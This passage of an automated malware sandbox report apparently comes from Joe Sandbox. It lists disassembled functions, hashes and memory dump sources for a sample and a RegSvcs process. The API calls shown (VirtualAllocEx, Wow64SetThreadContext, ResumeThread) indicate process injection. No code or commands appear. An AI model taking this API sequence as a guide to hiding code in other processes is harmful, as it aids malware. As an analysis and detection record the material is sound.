                                            • Opcode Fuzzy Hash: b1cb0b6f9f1d54ced802e2d4f3eb1655a5ffb1af53abc275f0574c50e652fbac
                                            • Instruction Fuzzy Hash: 9431A7B9D042589FCF10CFA9D884ADEFBB1FB59320F20942AE815B7240D735A906CF54
                                            Function 09DB69D8 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 09DB6A82
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2239272748.0000000009DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09DB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_9db0000_aVmZDnwW.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: 1ed9a21066f81a165235e100a8c5b3efacad39f414986a924d3e29bd009186f7
                                            • Instruction ID: ad494e79738b160901bc8134bc6d07d121bcfebf29f38b81aa2bd713be1ef3dd
                                            • Opcode Fuzzy Hash: 1ed9a21066f81a165235e100a8c5b3efacad39f414986a924d3e29bd009186f7
                                            • Instruction Fuzzy Hash: 423196B9D04258DBCF10CFA9D984ADEFBB5FB59320F10942AE815BB200D735A905CF64
                                            Function 09DB68A8 Relevance: 1.6, APIs: 1, Instructions: 97threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • Wow64SetThreadContext.KERNEL32(?,?), ref: 09DB695F
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2239272748.0000000009DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09DB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_9db0000_aVmZDnwW.jbxd
                                            Similarity
                                            • API ID: ContextThreadWow64
                                            • String ID:
                                            • API String ID: 983334009-0
                                            • Opcode ID: 5f727e8dba81aa4510ac0ac49e41ee37f050f2f1e6ee746148601eaa8e07e6b9
                                            • Instruction ID: baa23f741a339cb0db04d92ce0ef64935941add40b99282395da3d77ef79422e
                                            • Opcode Fuzzy Hash: 5f727e8dba81aa4510ac0ac49e41ee37f050f2f1e6ee746148601eaa8e07e6b9
                                            • Instruction Fuzzy Hash: 6641AAB5D00258DFDB14CFA9D984AEEBBF1BF49320F24842AE419BB240C7389945CF54
                                            Function 09DB68B0 Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • Wow64SetThreadContext.KERNEL32(?,?), ref: 09DB695F
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2239272748.0000000009DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09DB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_9db0000_aVmZDnwW.jbxd
                                            Similarity
                                            • API ID: ContextThreadWow64
                                            • String ID:
                                            • API String ID: 983334009-0
                                            • Opcode ID: 1748cff033a44992d30b765418cb20eaa59bb50528798ba203989af401774dd0
                                            • Instruction ID: 69817f7fc7b63c47f59160a112e1587d5cc83dc3d642d6a08a23d6c9a43366cc
                                            • Opcode Fuzzy Hash: 1748cff033a44992d30b765418cb20eaa59bb50528798ba203989af401774dd0
                                            • Instruction Fuzzy Hash: 0C3199B5D00258DFDB14CFA9D984AEEBBF1BB49320F14802AE419BB240D778A945CF94
                                            Function 00E08278 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • VirtualProtect.KERNELBASE(?,?,?,?), ref: 00E0831F
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2229308253.0000000000E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E00000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_e00000_aVmZDnwW.jbxd
                                            Similarity
                                            • API ID: ProtectVirtual
                                            • String ID:
                                            • API String ID: 544645111-0
                                            • Opcode ID: 6540d93e09e8eedde57bad086354ac5e7055d89d2234e3746055b72e77520d90
                                            • Instruction ID: a4f330066461d3a5ae907a10c94f39e1973bf45dfffd918d8193d25aea986a33
                                            • Opcode Fuzzy Hash: 6540d93e09e8eedde57bad086354ac5e7055d89d2234e3746055b72e77520d90
                                            • Instruction Fuzzy Hash: 3B31A9B9D042589FCB14CFA9D984ADEFBF0BB59310F24A02AE814B7210C775A944CF64
                                            Function 09DBA6C0 Relevance: 1.6, APIs: 1, Instructions: 89windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • PostMessageW.USER32(?,?,?,00000000), ref: 09DBA763
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2239272748.0000000009DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09DB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_9db0000_aVmZDnwW.jbxd
                                            Similarity
                                            • API ID: MessagePost
                                            • String ID:
                                            • API String ID: 410705778-0
                                            • Opcode ID: 7f54143c47842bc8c55443ad9c048ac85b9b0fa02e017bb53fae25b9d7c7e739
                                            • Instruction ID: 3e3396b09fcbd9a805179b1fba2c62da4236bd90d62140166f0b86c789d968c2
                                            • Opcode Fuzzy Hash: 7f54143c47842bc8c55443ad9c048ac85b9b0fa02e017bb53fae25b9d7c7e739
                                            • Instruction Fuzzy Hash: F93177B9D04258DFCB14CFA9D984ADEFBF0AB59310F24902AE819BB310D375A9458F64
                                            Function 09DB3598 Relevance: 1.6, APIs: 1, Instructions: 88windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • PostMessageW.USER32(?,?,?,00000000), ref: 09DBA763
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2239272748.0000000009DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09DB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_9db0000_aVmZDnwW.jbxd
                                            Similarity
                                            • API ID: MessagePost
                                            • String ID:
                                            • API String ID: 410705778-0
                                            • Opcode ID: ebe73d1bad5fcc807f1a12607531b5eb3c64b1541319b73f5ccc1cca85314d13
                                            • Instruction ID: 04d9abcb5593b3268931cc8719a2fc204fac651445c2dd91d3e5612a778a723d
                                            • Opcode Fuzzy Hash: ebe73d1bad5fcc807f1a12607531b5eb3c64b1541319b73f5ccc1cca85314d13
                                            • Instruction Fuzzy Hash: 1D3177B9D04248EFCB14CFA9D584ADEFBF4AB59310F14902AE815BB310D375A9458F64
                                            Function 09DB6380 Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • ResumeThread.KERNELBASE(?), ref: 09DB6406
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2239272748.0000000009DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09DB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_9db0000_aVmZDnwW.jbxd
                                            Similarity
                                            • API ID: ResumeThread
                                            • String ID:
                                            • API String ID: 947044025-0
                                            • Opcode ID: 77554957c3b15b8f82449b3ea0d3ad11a6b3ef69055a8df12265b03604b1a80a
                                            • Instruction ID: 0c391c71d753c6ef8b0437bdb5d20270b1962299e3da13306f16ccf3ee2dd016
                                            • Opcode Fuzzy Hash: 77554957c3b15b8f82449b3ea0d3ad11a6b3ef69055a8df12265b03604b1a80a
                                            • Instruction Fuzzy Hash: 5631A7B4D002589FCB14CFA9E985AEEFBB4EB49320F14942AE819B7210C735A901CF64
                                            Function 09DB6388 Relevance: 1.6, APIs: 1, Instructions: 73threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • ResumeThread.KERNELBASE(?), ref: 09DB6406
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2239272748.0000000009DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09DB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_9db0000_aVmZDnwW.jbxd
                                            Similarity
                                            • API ID: ResumeThread
                                            • String ID:
                                            • API String ID: 947044025-0
                                            • Opcode ID: bbdbbbc548ddfed1baea0448ff628b3602c8c8a2998e84677e140e1013586ba5
                                            • Instruction ID: 24a53d156e668be20f2cd087e050d489a24c90b6e2fd74f7e0088a2323d13d68
                                            • Opcode Fuzzy Hash: bbdbbbc548ddfed1baea0448ff628b3602c8c8a2998e84677e140e1013586ba5
                                            • Instruction Fuzzy Hash: B831A9B5D042189FCB14CFA9D985ADEFBB4EF49320F14942AE819B7300CB35A901CFA4
                                            Function 00B7D4D8 Relevance: .1, Instructions: 75COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2228054157.0000000000B7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B7D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_b7d000_aVmZDnwW.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a8c418c787a43d1b049697c9cfe25580a5efef9a0eeb927b8651fc6b770e9bb7
                                            • Instruction ID: 024c434ddc056c2062f80b588d68188df1e9ce595350bd16ebe6907dae5df153
                                            • Opcode Fuzzy Hash: a8c418c787a43d1b049697c9cfe25580a5efef9a0eeb927b8651fc6b770e9bb7
                                            • Instruction Fuzzy Hash: 0021D3B1504204DFDB05DF14D9C0B26BFB5FFA8368F24C5A9E90A4B256C336D856CAA2
                                            Function 00B8D01C Relevance: .1, Instructions: 72COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2228101519.0000000000B8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_b8d000_aVmZDnwW.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6edb65405a37aa713bf6c6564df5e58e91267fcf9816b04e4596abc1c5622a42
                                            • Instruction ID: bcb4e7f8f7f5d39fe7646b2b9404ae4249d134827636307b7447d7417a905d1a
                                            • Opcode Fuzzy Hash: 6edb65405a37aa713bf6c6564df5e58e91267fcf9816b04e4596abc1c5622a42
                                            • Instruction Fuzzy Hash: 5521F575504204DFDB15EF14D9D4B16BBA5EB84324F24C5AED8094B2A6C33AD807CB61
                                            Function 00B8D1D4 Relevance: .1, Instructions: 72COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2228101519.0000000000B8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_b8d000_aVmZDnwW.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d1d853103854fe41dfdaca0343d0f00ab863545ef973b297118c3f8594a14500
                                            • Instruction ID: fc46d76cd5d8486b6c7cb1589f5424ea48151262ddab27de970c277136865fd6
                                            • Opcode Fuzzy Hash: d1d853103854fe41dfdaca0343d0f00ab863545ef973b297118c3f8594a14500
                                            • Instruction Fuzzy Hash: 8621D775604204DFDB05EF54D9C4B26BBA5FB84314F24C9AED9094B2E6C336D846CB61
                                            Function 00B8D006 Relevance: .1, Instructions: 60COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2228101519.0000000000B8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_b8d000_aVmZDnwW.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 49708113bc9735077fc083865b2d70dcb074ceaf41990d74dc31d03de32ef682
                                            • Instruction ID: ecff2c620f2621251d3862d33e90172fb11302957332b5c47d096b401358fa3d
                                            • Opcode Fuzzy Hash: 49708113bc9735077fc083865b2d70dcb074ceaf41990d74dc31d03de32ef682
                                            • Instruction Fuzzy Hash: 9C21A4755093808FDB02DF24D594715BFB1EB46314F28C5DBD8498B2A7C33AD80ACB62
                                            Function 00B7D4D3 Relevance: .1, Instructions: 56COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2228054157.0000000000B7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B7D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_b7d000_aVmZDnwW.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
                                            • Instruction ID: dd99b887812dd0cb524922462459ee07131842bbe183e20cc201ca0e285c9a28
                                            • Opcode Fuzzy Hash: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
                                            • Instruction Fuzzy Hash: 2211D376504240CFCB16CF14D5C4B16BFB1FFA4324F24C6A9D9090B256C33AD85ACBA1
                                            Function 00B8D1CF Relevance: .1, Instructions: 53COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2228101519.0000000000B8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_b8d000_aVmZDnwW.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
                                            • Instruction ID: f3e76093156d66653dcbfe5ad79f72e57d7f7db25648df30be55f99a94a7a3bd
                                            • Opcode Fuzzy Hash: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
                                            • Instruction Fuzzy Hash: 9811DD75504280DFCB02DF14C5C4B15FBB1FB84314F24C6AED8494B2A6C33AD80ACB61
                                            Function 00B7D745 Relevance: .0, Instructions: 45COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2228054157.0000000000B7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B7D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_b7d000_aVmZDnwW.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: eb3d00550393b65bc9c0ebfdb56ff924dc5112e4786b6744de5ec82ba750173b
                                            • Instruction ID: d6b3c6ba0c5d7280115b49f177f609fbb1e779eded4c9ac08efa7ce3ab1fc5fa
                                            • Opcode Fuzzy Hash: eb3d00550393b65bc9c0ebfdb56ff924dc5112e4786b6744de5ec82ba750173b
                                            • Instruction Fuzzy Hash: C8012B710083409AE7158F19CDC4B26BFF8DF413B0F18C59AED1D0B286D6399C40C6B1
                                            Function 00B7D744 Relevance: .0, Instructions: 36COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2228054157.0000000000B7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B7D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_b7d000_aVmZDnwW.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 212cc47274dd480bc20a007800ec1abe138912505c064104f8f7801f28343d07
                                            • Instruction ID: b40560bbd13508cda250496dd3f3b70e320af696a0804b517854ce53d12bedb0
                                            • Opcode Fuzzy Hash: 212cc47274dd480bc20a007800ec1abe138912505c064104f8f7801f28343d07
                                            • Instruction Fuzzy Hash: A2F0C2720043409AE7148F19C9C8B62FFE8EF91374F18C15AED0C4B286C2799C40CBB0

                                            Executed Functions

                                            Function 0303B328 Relevance: 6.6, Strings: 5, Instructions: 349COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2313491691.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_3030000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 0oFp$LjFp$LjFp$PHcq$PHcq
                                            • API String ID: 0-3391486992
                                            • Opcode ID: 0091b690a80bb183d751909df0c80b30150df7a79c5233c79bf63f3b7f45949f
                                            • Instruction ID: e41602bde15b1d44fb5884444dfc807d2830e18242240e59adbab8430ba63398
                                            • Opcode Fuzzy Hash: 0091b690a80bb183d751909df0c80b30150df7a79c5233c79bf63f3b7f45949f
                                            • Instruction Fuzzy Hash: 0EE10874E01618CFDB14CFA9C884A9DBBF5FF89314F1980A9E819AB361DB35A841CF54
                                            Function 0303BEB0 Relevance: 6.4, Strings: 5, Instructions: 191COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2313491691.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_3030000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 0oFp$LjFp$LjFp$PHcq$PHcq
                                            • API String ID: 0-3391486992
                                            • Opcode ID: 629a2e44f572f2f8f4b2562f36efd8860a20a73f3db83f0dd0e21456ab8b7edd
                                            • Instruction ID: 1360eb8c59567ded7bde15f9b664b414720765eb06019b0f4e43f3653eb329ee
                                            • Opcode Fuzzy Hash: 629a2e44f572f2f8f4b2562f36efd8860a20a73f3db83f0dd0e21456ab8b7edd
                                            • Instruction Fuzzy Hash: DF81C674E01258CFDB14DFAAD884A9DBBF2BF89300F149069E409AB365DB349981CF50
                                            Function 0303C752 Relevance: 6.4, Strings: 5, Instructions: 189COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2313491691.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_3030000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 0oFp$LjFp$LjFp$PHcq$PHcq
                                            • API String ID: 0-3391486992
                                            • Opcode ID: f0b9aa2901ac9008c3de3d5da74f0ae0ad4b02c64a37fb689c9e86cf5a90bfcc
                                            • Instruction ID: 88163cd9ebf34b7378b835457e6c329189dfba3e7ddc80e6caf3af0d0917ed3b
                                            • Opcode Fuzzy Hash: f0b9aa2901ac9008c3de3d5da74f0ae0ad4b02c64a37fb689c9e86cf5a90bfcc
                                            • Instruction Fuzzy Hash: 0D81B374E01218DFEB54DFAAD884A9DBBF6FF89300F14806AE419EB265DB349941CF50
                                            Function 0303C190 Relevance: 6.4, Strings: 5, Instructions: 187COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2313491691.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_3030000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 0oFp$LjFp$LjFp$PHcq$PHcq
                                            • API String ID: 0-3391486992
                                            • Opcode ID: fc0b362553eb4d0da1bebe15331c2fa8d16dee611d9f15fe55758ecd2936b1f9
                                            • Instruction ID: ac454178190d24f516e9f62721471cd88e51ec518cb37cd9f835ed70d3d8198b
                                            • Opcode Fuzzy Hash: fc0b362553eb4d0da1bebe15331c2fa8d16dee611d9f15fe55758ecd2936b1f9
                                            • Instruction Fuzzy Hash: A981A374E012189FEB54DFAAD884A9DBBF6BF89300F14C069E419EB365DB349941CF50
                                            Function 0303CA32 Relevance: 6.4, Strings: 5, Instructions: 186COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2313491691.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_3030000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 0oFp$LjFp$LjFp$PHcq$PHcq
                                            • API String ID: 0-3391486992
                                            • Opcode ID: e6e537c7180b8ee1c139d48c7130344ceff6e0ef5944cad73f66c57f5089c397
                                            • Instruction ID: 707ea5bde22c858afb952c8c96c7bd6fa4dec9c11b44269861573b94499028f8
                                            • Opcode Fuzzy Hash: e6e537c7180b8ee1c139d48c7130344ceff6e0ef5944cad73f66c57f5089c397
                                            • Instruction Fuzzy Hash: AD81C374E01208DFEB54DFAAD884A9DBBF2BF89300F14C069E409AB365DB349981CF50
                                            Function 03034AD9 Relevance: 6.4, Strings: 5, Instructions: 186COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2313491691.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_3030000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 0oFp$LjFp$LjFp$PHcq$PHcq
                                            • API String ID: 0-3391486992
                                            • Opcode ID: fdfaee8bb3c5af606d938d4e2aee4b078faa0b9a113d3dea6c4c29aec9a08c8d
                                            • Instruction ID: 448097a5f72bb9b38be6acb122bcf9aaa3276e4c057278f11e19b06660a3baad
                                            • Opcode Fuzzy Hash: fdfaee8bb3c5af606d938d4e2aee4b078faa0b9a113d3dea6c4c29aec9a08c8d
                                            • Instruction Fuzzy Hash: 14819274E01218DFDB54CFAAD984A9DBBF2BF89300F14C069E419AB265DB749981CF50
                                            Function 0303C470 Relevance: 6.4, Strings: 5, Instructions: 184COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2313491691.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_3030000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 0oFp$LjFp$LjFp$PHcq$PHcq
                                            • API String ID: 0-3391486992
                                            • Opcode ID: 78da7d9a0e17399620e2307b0ea8144e695cf47aabd72083bdda83a70cae5e7a
                                            • Instruction ID: 97a8ff534ad0408601133964507cf74d2fbed2c480c647099c21e765ec0edaba
                                            • Opcode Fuzzy Hash: 78da7d9a0e17399620e2307b0ea8144e695cf47aabd72083bdda83a70cae5e7a
                                            • Instruction Fuzzy Hash: CF81C174E01208CFEB14DFAAD984A9DBBF6BF89300F14D069E419EB265DB349981CF50
                                            Function 0303BBD2 Relevance: 6.4, Strings: 5, Instructions: 183COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2313491691.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_3030000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 0oFp$LjFp$LjFp$PHcq$PHcq
                                            • API String ID: 0-3391486992
                                            • Opcode ID: 48ab6652fb25d2be3628560267bf846e4245e1561abcbd29ccb3dd3a8994fd4d
                                            • Instruction ID: d5ec1db5e11ebb436c66a81a67accbece7bf86b671deb370092188b5e9f03f3f
                                            • Opcode Fuzzy Hash: 48ab6652fb25d2be3628560267bf846e4245e1561abcbd29ccb3dd3a8994fd4d
                                            • Instruction Fuzzy Hash: 7C81A274E01218DFDB54DFAAD884A9DBBF2BF89304F14C069E419AB365EB349981CF50
                                            Function 03036880 Relevance: 5.3, Strings: 4, Instructions: 328COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2313491691.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_3030000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (ocq$(ocq$,gq$,gq
                                            • API String ID: 0-2401767512
                                            • Opcode ID: eeb62a8cf144121a9b10bbcc59373cec661b2ba44f2ecf20725f14f77be6595e
                                            • Instruction ID: 0183d1501b7579424b295dd6d3c63aa2d92fb3efd07fa3486fbce7409a80bf1d
                                            • Opcode Fuzzy Hash: eeb62a8cf144121a9b10bbcc59373cec661b2ba44f2ecf20725f14f77be6595e
                                            • Instruction Fuzzy Hash: 5CD10971A01119EFCB54CFA9C9C4AADBBFAFF8A340F198055E405AB265D732E981CF50
                                            Function 0303B4F2 Relevance: 3.9, Strings: 3, Instructions: 151COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2313491691.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_3030000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 0oFp$PHcq$PHcq
                                            • API String ID: 0-775545523
                                            • Opcode ID: b06f30e6a6c786d9574fe0cd80c0f70ad32b7776794eac4e99447353b4fb8d5a
                                            • Instruction ID: 684498acfc74664505009451a9aa53d4d2c366fb8380fc16e9401691eea325c2
                                            • Opcode Fuzzy Hash: b06f30e6a6c786d9574fe0cd80c0f70ad32b7776794eac4e99447353b4fb8d5a
                                            • Instruction Fuzzy Hash: E561A374E016089FDB14DFAAD984A9EBBF6FF89300F14C06AE419AB365DB345941CF50
                                            Function 03039858 Relevance: 3.4, Strings: 2, Instructions: 854COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2313491691.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_3030000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (ocq$4'cq
                                            • API String ID: 0-3004416391
                                            • Opcode ID: 04826264d3fc4634d5616f0a89db011a6b988cd71f18416e2275dc3569e37718
                                            • Instruction ID: 82df627b3db8b089a43fb3480a21bf35569f58d02268c9da8f20f41f360fb257
                                            • Opcode Fuzzy Hash: 04826264d3fc4634d5616f0a89db011a6b988cd71f18416e2275dc3569e37718
                                            • Instruction Fuzzy Hash: 9372A271B01609CFCB15CF68C984AAEBBFAFF8A310F158555E8459B3A5D770E881CB60
                                            Function 03036108 Relevance: 3.0, Strings: 2, Instructions: 515COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2313491691.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_3030000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (ocq$Hgq
                                            • API String ID: 0-2239030825
                                            • Opcode ID: a45f4c7620e9cf5996da705ef37d972dcec976a06189c351c973b818b2739739
                                            • Instruction ID: 000d59d3a51b743c15a6369e8965cfea53ee2c3e142f262307044907e6e3c23e
                                            • Opcode Fuzzy Hash: a45f4c7620e9cf5996da705ef37d972dcec976a06189c351c973b818b2739739
                                            • Instruction Fuzzy Hash: A0129170A002199FCB18DF69C994BAEBBFAFF89300F148569E405DB395DB359D81CB90
                                            Function 03036E58 Relevance: 10.5, Strings: 8, Instructions: 473COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2313491691.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_3030000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (ocq$(ocq$(ocq$(ocq$(ocq$(ocq$,gq$,gq
                                            • API String ID: 0-3338910979
                                            • Opcode ID: 70dcaca5624b4269e9900b61920204e7cb8fe0faf5fac527de2b247e4d401b14
                                            • Instruction ID: 43a26609f23ab93347449dd6692d046f593e98b8bb68122905be32d0fdbfa93e
                                            • Opcode Fuzzy Hash: 70dcaca5624b4269e9900b61920204e7cb8fe0faf5fac527de2b247e4d401b14
                                            • Instruction Fuzzy Hash: 79127B70A01609DFCB55CF69C884A9EBBFAFF8A710F158599E805DB261DB30ED40CB50
                                            Function 030377F0 Relevance: 3.2, Strings: 2, Instructions: 688COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2313491691.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_3030000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $cq$$cq
                                            • API String ID: 0-2695052418
                                            • Opcode ID: 651d89e6629435753711ee3a4d3bd7e3156ec8845dafb9e1b0ba323a6a3ea335
                                            • Instruction ID: 1dc85287c85515e9485c7b932919ea02a3489a23a97053d37129280a106a9c90
                                            • Opcode Fuzzy Hash: 651d89e6629435753711ee3a4d3bd7e3156ec8845dafb9e1b0ba323a6a3ea335
                                            • Instruction Fuzzy Hash: 0C525178A005198FEB55DFA5C850BAEBB72FF94300F5080AAC10A6B7A5CF389D85DF51
                                            Function 030356A8 Relevance: 2.8, Strings: 2, Instructions: 325COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
